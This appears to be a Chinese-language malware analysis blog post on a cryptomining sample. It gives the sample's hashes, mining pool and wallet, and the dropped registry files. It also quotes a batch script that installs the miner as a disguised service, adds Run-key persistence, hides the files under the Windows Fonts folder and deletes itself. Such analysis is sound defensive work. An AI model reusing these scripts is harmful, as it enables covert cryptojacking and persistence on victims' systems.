一個挖礦樣本分析

0x00 概述

  本來是想分析一下Sodinokibi病毒的新的變種，但是分析了一部分，被他的混淆和循環弄得有點頭疼，東西還都是壓在內存里。偶然翻到幾年前的一個樣本分析，又重新看了一下，發現自己在逆向這塊幾年了，也沒實質性的提升，真是光陰喂了狗。這個樣本是一個挖礦樣本，那時候的樣本挖礦還是直接CUP干到100%，還沒有后來樣本那樣CUP占用率可配置。整體的惡意樣本思路也比較清晰就是挖礦賺錢，盡量讓管理員沒有辦法追蹤，及時定位到了惡意程序了也讓他不容啥掉。

1.1 基本信息

文件名	explorer.exe
文件大小	5455872 KB
文件MD5	721e7123e2a413fb8fd4dc6262473f57
文件SHA1	89c8b778d6f56a7974357cc104ccdcb51169d907
文件SHA256	3966f7a96536ac2435056d0860ecb8fbc3cf52f665c48fa303149bc423fe6d3a
文件CRC	70AB0903
文件類型	exe

1.2 分析環境

系統	win7 x64
軟件	IDA,OD

0x01 功能描述

        樣本要是的功能是釋放各種文件，其中包括挖礦客戶端，守護程序及其他的痕跡清除，權限駐留等操作腳本。樣本的目的就是給礦池wakuang.aimezi.com，錢包地址：49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics進行挖礦。

0x02 樣本調試分析

1.查殼。樣本沒有進行加殼。

2.樣本創建投放文件

   對樣本動態調試檢測，發現樣本創建並投放了5個惡意文件，其一就是創建投放conhosts.exe文件即挖礦的客戶端程序。

二是創建並投放server.reg，

Server.reg內容

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServiceMains]

"Description"="Performance library information from Windows Management Instrumentation (WMI) providers to clients on the network. This service only runs when Performance Data Helper is activated."

"DisplayName"="WMI Adapter Services"

其三是創建並投放restart.reg

restart.reg內容

Windows Registry Editor Version 5.00

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Tomcat"=""C:\\Windows\\system\\svchost.exe"

其四是釋放惡意的csrss.exe程序，對挖礦客戶端（conhosts.exe）有守護作用。

並建立了相應的注冊表項

其五是創建並投放1.bat。

1.bat內容如下所示，通過1.bat的內容可以知道，腳本的作用是啟動挖礦客戶端，啟動相關惡意程序，並完成相關腳本的刪除工作。

@csrss.exe install WindowsATE conhosts -a cryptonight -o stratum+tcp://wakuang.aimezi.com:7777 -u 49oJQsyUYU5GuH9hKDhdQhXvCZJT92pr27RzhmMY4uhyjSEoMXom6ciBbC4kTpwUitcXbahCuFqW6dvUr9kcBzKA8iYXics -p x -nofee 1 -dbg -1 -t 1

@csrss.exe start WindowsATE

@C:\Windows\regedit /s server.reg

@C:\Windows\regedit /s restart.reg

@del server.reg

@del restart.reg

@attrib +s +h C:\Windows\Fonts\conhosts.exe

@attrib +s +h C:\Windows\Fonts\libcurl.dll

@attrib +s +h C:\Windows\Fonts\libeay32.dll

@attrib +s +h C:\Windows\Fonts\libgcc_s_seh-1.dll

@attrib +s +h C:\Windows\Fonts\libstdc++-6.dll

@attrib +s +h C:\Windows\Fonts\libwinpthread-1.dll

@attrib +s +h C:\Windows\Fonts\ssleay32.dll.dll

@attrib +s +h C:\Windows\Fonts\msvcr71.dll

@attrib +s +h C:\Windows\Fonts\csrss.dll

@attrib +s +h C:\Windows\Fonts\zlib1.dll

@del %0

3. 創建安裝服務啟動項，在逆向代碼中的可以看到，安裝了WindowsATE服務項。

4.清除日志操作。從樣本的靜態及動態分析結果來看，樣本在運行的時候會執行清除日志的命令。

通過ida的靜態分析也發現了相關的日志清除日志

5.啟動挖礦客戶端的命令行代碼，礦池地址，通信端口等。 對樣本進行逆向，可以看到啟動客戶端的地址，端口等信息。

0x03 總結

    就是一個簡單的挖礦樣本分析，當時這個樣本出現的時候，正式struts2漏洞大殺四方的時候，很多都是通過 struts2漏洞進行投放的。